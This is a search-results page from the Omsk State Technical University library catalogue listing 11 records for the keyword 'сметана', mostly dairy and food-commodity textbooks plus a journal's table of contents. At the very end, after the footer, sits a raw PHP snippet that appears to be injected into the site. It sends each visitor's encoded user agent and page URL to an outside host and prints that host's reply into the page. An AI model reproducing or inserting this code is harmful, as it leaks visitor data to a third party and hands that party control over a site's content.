Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

87 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Сметана")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Коник Н. В. Товароведение, экспертиза и сертификация молока и молочных продуктов [Текст] : учеб. пособие / Н. В. Коник, Е. А. Павлова, И. С. Киселева, 2009. - 2345 с.
Держатели документа (Информация об экземплярах) 
2. 
Гранаткина, Наталья Викторовна. Товароведение и организация торговли продовольственными товарами [Текст] / Н. В. Гранаткина, 2012. - 248, [1] с.
Держатели документа (Информация об экземплярах) 

Изложены теоретические основы товароведения, приведены классификация и характеристика продовольственных товаров. Рассмотрены показатели качества, дефекты и сроки хранения товаров, организация торговли и основные виды торгового оборудования.

В 5-е издание внесены изменения, связанные с введением в действие новых нормативных документов на продовольственные товары по состоянию на 1 августа 2011 г.

Учебное пособие может быть использовано при освоении профессионального модуля ПМ.02 "Продажа продовольственных товаров" (МДК.02.01) по профессии 100701.01 "Продавец, контролер-кассмр".

Для ускоренной подготовки продавцов продовольственных товаров. Может быть использовано при других формах обучения.

3. 
Арет В. А. Физико-механические свойства сырья и готовой продукции [Текст] / В. А. Арет, Б. Л. Николаев, Л. К. Николаев ; дар. В. В. Арсеньев, 2009. - 442, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии широко освещены и теоретические, и экспериментальные составляющие курса. Изложены основы инженерной реологии и ее применения в расчетах оборудования жиолслдержащих пищевых продуктов. Приведены выводы расчетных зависимостей, что облегчает понимание физической и математической сущности рассматриваемых вопросов. Достаточно полно представлены экспериментальные данные реометрии мноших жиросодержащих продуктов при их различных фазовых состояниях: застывшем состоянии, в стадии плавления и в расплавленном виде. Экспериментальные данные приводятся в широком интервале градиента скорости и касательного напряжения, что возволяет использовать их для расчета различного оборудования.

4. 
Пищевая промышленность. - Журнал, 2009г. № 9
Оглавление 
  • Панфилов, В. А. Разработка образа пищевого предприятия XXI века - необходимое условие систематического развития технологий и техники / В. А. Панфилов. - с.8-10
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЕ
  • Акулич, А. В. Сушка плодоовощного сырья с использованием ИК-излучения / А. В. Акулич, А. В. Темрук. - с.12-13
    Кл. слова: СУШКА инфракрасная, СЫРЬЕ плодоовощное, СУШИЛКА комбинированная
  • Тукачев, В. Е. Устройства нового поколения для резки и сушки макаронных изделий / В. Е. Тукачев, М. В. Калачев, Ю. В. Зуева. - с.14-16
    Кл. слова: РЕЗКА макаронных изделий, СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шуляк, В. А. Обжарочные аппараты малой производительности / В. А. Шуляк, А. В. Булгак. - с.18-21
    Кл. слова: АППАРАТ обжарочный
  • Шкоп, Я. Я. Технология КНП-фриго для производства функциональной пищи / Я. Я. Шкоп. - с.22-23
    Кл. слова: КОНЦЕНТРАТ натуральных продуктов
  • Влияние нанотехнологических добавок морского генеза на свойства эмульсионных продуктов. - с.30-32
    Кл. слова: МАЙОНЕЗ, ПОЛИСАХАРИДЫ, ЭМУЛЬГАТОР
  • Бердутина, А. В. Методика определения эмульсионных свойств белковых препаратов / А. В. Бердутина, А. С. Громов. - с.35-37
    Кл. слова: ПРЕПАРАТ белковый
  • Феофилактова, О. В. Разработка соусов с применением эубиотических микроорганизмов и их метаболитов / О. В. Феофилактова, А. В. Казаков. - с.38-39
    Кл. слова: СОУСЫ
  • Матисон, В. А. Улучшение качества системы управления персоналом / В. А. Матисон. - с.48-49
    Кл. слова: УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Арутюнова, Н. И. Формирование концепции нового продукта питания на основе оценки требований потребителей / Н. И. Арутюнова, В. А. Матисон. - с.50-51
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Шанин, А. А. Современные высокоэффективные моющие и дезинфицирующие средства для пищевой промышленности / А. А. Шанин, Ю. А. Корнев. - с.52-53
    Кл. слова: СРЕДСТВА МОЮЩИЕ, СРЕДСТВА дезинфицирующие
  • Хасанова, С. Д. Продление сроков хранения помадных конфет / С. Д. Хасанова, З. Г. Скобельская. - с.54-55
    Кл. слова: КОНФЕТЫ, СРОК ХРАНЕНИЯ ПРОДУКТОВ
  • Евдокимова, О. В. Товарные свойства культивируемого женьшеня / О. В. Евдокимова. - с.56-57
    Кл. слова: женьшень
  • Как улучшить качество сметанного продукта?. - с.58-60
    Кл. слова: СМЕТАНА, КАЧЕСТВО ПРОДУКЦИИ
  • Экстракт фукуса для производства продуктов, обогащенных йодом. - с.61
    Кл. слова: фукус, ЙОД - ПИТАНИЕ
  • Жадан, П. В икре самое "лакомое" - антибиотики? / П. Жадан. - с.63
    Кл. слова: ИКРА
  • Бакуменко, О. Е. Принципы разработки функциональных продуктов для студентов / О. Е. Бакуменко, Т. В. Иванникова, Ю. О. Натокина. - с.64-65
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Роль функционального питания в коррекции йоддефицитных состояний. - с.66-68
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ, ПРОДУКТЫ йодированные
5. 
Шепелев А. Ф. Товароведение и экспертиза молока и молочных продуктов [Текст] : Учеб. пособие / А. Ф. Шепелев, О. И. Кожухова. - 127 с.
Держатели документа (Информация об экземплярах) 
6. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
7. 
20 избранных мелодий. Шедевры классики [Электронный ресурс], 1999. - 1 o=эл. опт. диск (CD-ROM)
Держатели документа (Информация об экземплярах) 
8. 
Варгафтик, Артем Михайлович. Партитуры тоже не горят [Текст] / Артем Варгафтик, 2006. - 333 с.
Держатели документа (Информация об экземплярах) 
9. 
Холодильная обработка молока и молочных продуктов [Текст] : сб. науч. тр. / ВНИКТИхолодпром, 1985. - 95, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Расчет материальных потоков при переработке молока в курсовом и дипломном проектировании [Текст] : учеб. пособие для вузов по направлению 260300 "Технология сырья и продуктов животного происхождения" по специальности "Технология молока и молочных продуктов" / И. А. Евдокимов [и др.], 2009. - 271 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие представляет собой руководство по выполнению расчетов материальных потоков при переработке молока на различные виды молочных продуктов цельномолочного, маслодельного, сыродельного и молочноконсервного направлений. В пособии приведены схемы безотходной переработки молока на продукты цельномолочного производства, масло, сыр и молочные консервы, нормы расхода сырья и основных компонентов при выработке молочных продуктов, нормируемые потери по отдельным технологическим операциям, рецептурные составы основных видов продуктов.

11. 
История зарубежной музыки [Текст] : В 5 вып.: Учеб. для консерваторий. Вып. 4 : Вторая половина XIX века / М. С. Друскин, 1980. - 528 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.14 запросов, 0.61c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;